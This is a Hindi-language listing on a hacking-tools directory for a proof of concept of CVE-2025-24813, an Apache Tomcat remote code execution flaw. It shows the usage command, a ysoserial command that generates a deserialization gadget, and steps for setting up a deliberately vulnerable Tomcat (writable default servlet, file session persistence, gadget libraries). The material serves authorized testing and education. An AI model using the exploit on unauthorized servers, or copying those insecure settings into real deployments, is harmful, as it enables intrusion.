Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24813-POC — CVE-2025-24813 Apache Tomcat RCE प्रूफ ऑफ कॉन्सेप्ट (PoC) | Kitploit
उपकरण/GitHubGitHub/alaatk/cve-2025-24813-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubalaatk/cve-2025-24813-poc

CVE-2025-24813-POC

CVE-2025-24813 Apache Tomcat RCE प्रूफ ऑफ कॉन्सेप्ट (PoC)

रिपॉजिटरी देखें
451 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24813 Apache Tomcat RCE PoC

Apache Tomcat में CVE-2025-24813, एक रिमोट कोड एक्जीक्यूशन (RCE) भेद्यता के लिए PoC।

महत्वपूर्ण: यह PoC केवल आपके स्वयं के वातावरण का परीक्षण करने या शैक्षिक उद्देश्यों के लिए है। इस PoC का उपयोग बिना उचित प्राधिकरण के सिस्टम का शोषण करने के लिए करना प्रतिबंधित है और अवैध हो सकता है। इस PoC के निर्माता और वितरक किसी भी दुरुपयोग या हुई क्षति के लिए जिम्मेदार नहीं हैं। किसी भी ऐसे वातावरण का परीक्षण करने से पहले हमेशा स्पष्ट अनुमति प्राप्त करें जो आपके स्वामित्व में नहीं है।


उपयोग

python3 CVE-2025-24813.py --url <target_url>

वातावरण सेटअप

टेस्ट पेलोड

कोड में पहले से ही ysoserial (https://github.com/frohoff/ysoserial) से उत्पन्न एक base64 एन्कोडेड पेलोड है जो /tmp में एक फ़ाइल RCE-success बनाता है, इस प्रकार:

java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/RCE-success" | base64 -w 0

भेद्य Tomcat सेटअप को कॉन्फ़िगर करना

  1. PUT / राइट एक्सेस सक्षम करें

    $CATALINA_HOME/conf/web.xml में संपादित करें और default सर्वलेट नाम अनुभाग के अंतर्गत readonly पैरामीटर जोड़ें तथा इसे false पर सेट करें।

        <servlet>
            <servlet-name>default</servlet-name>
            <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
            <init-param>
                <param-name>debug</param-name>
                <param-value>0</param-value>
            </init-param>
            <init-param>
                <param-name>listings</param-name>
                <param-value>false</param-value>
            </init-param>
            <init-param>
              <param-name>readonly</param-name>
              <param-value>false</param-value>
            </init-param>
            <load-on-startup>1</load-on-startup>
        </servlet>
    
  2. सेशन पर्सिस्टेंस सक्षम करें

    • भाग a) $CATALINA_HOME/conf/context.xml में संपादित करें और निम्नलिखित सेटिंग जोड़ें।
        <Manager className="org.apache.catalina.session.PersistentManager">
          <Store className="org.apache.catalina.session.FileStore" />
        </Manager>
    
    • भाग b) $CATALINA_HOME/webapps/ROOT/index.jsp में संपादित करें और सुनिश्चित करें कि सेशन के लिए डिफ़ॉल्ट सेटिंग "false" न हो या बस इसे हटा दें।
     <%@ page session="true" pageEncoding="UTF-8" contentType="text/html; charset=UTF-8" %>
    

    या

     <%@ page pageEncoding="UTF-8" contentType="text/html; charset=UTF-8" %>
    
  3. निर्भरताएँ $CATALINA_HOME/lib/ में डाउनलोड करें

cd $CATALINA_HOME/lib/
wget https[:]//repo1.maven[.]org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar
wget https[:]//repo1.maven[.]org/maven2/commons-beanutils/commons-beanutils/1.9.2/commons-beanutils-1.9.2.jar
wget https[:]//repo1.maven[.]org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar

आउटपुट

  • सफल शोषण:
[+] Exploit most likely succeeded
  • असफल शोषण:
[-] Exploit failed with status code: {status_code}, instead of 500,409

Demo

टूल डाउनलोड करें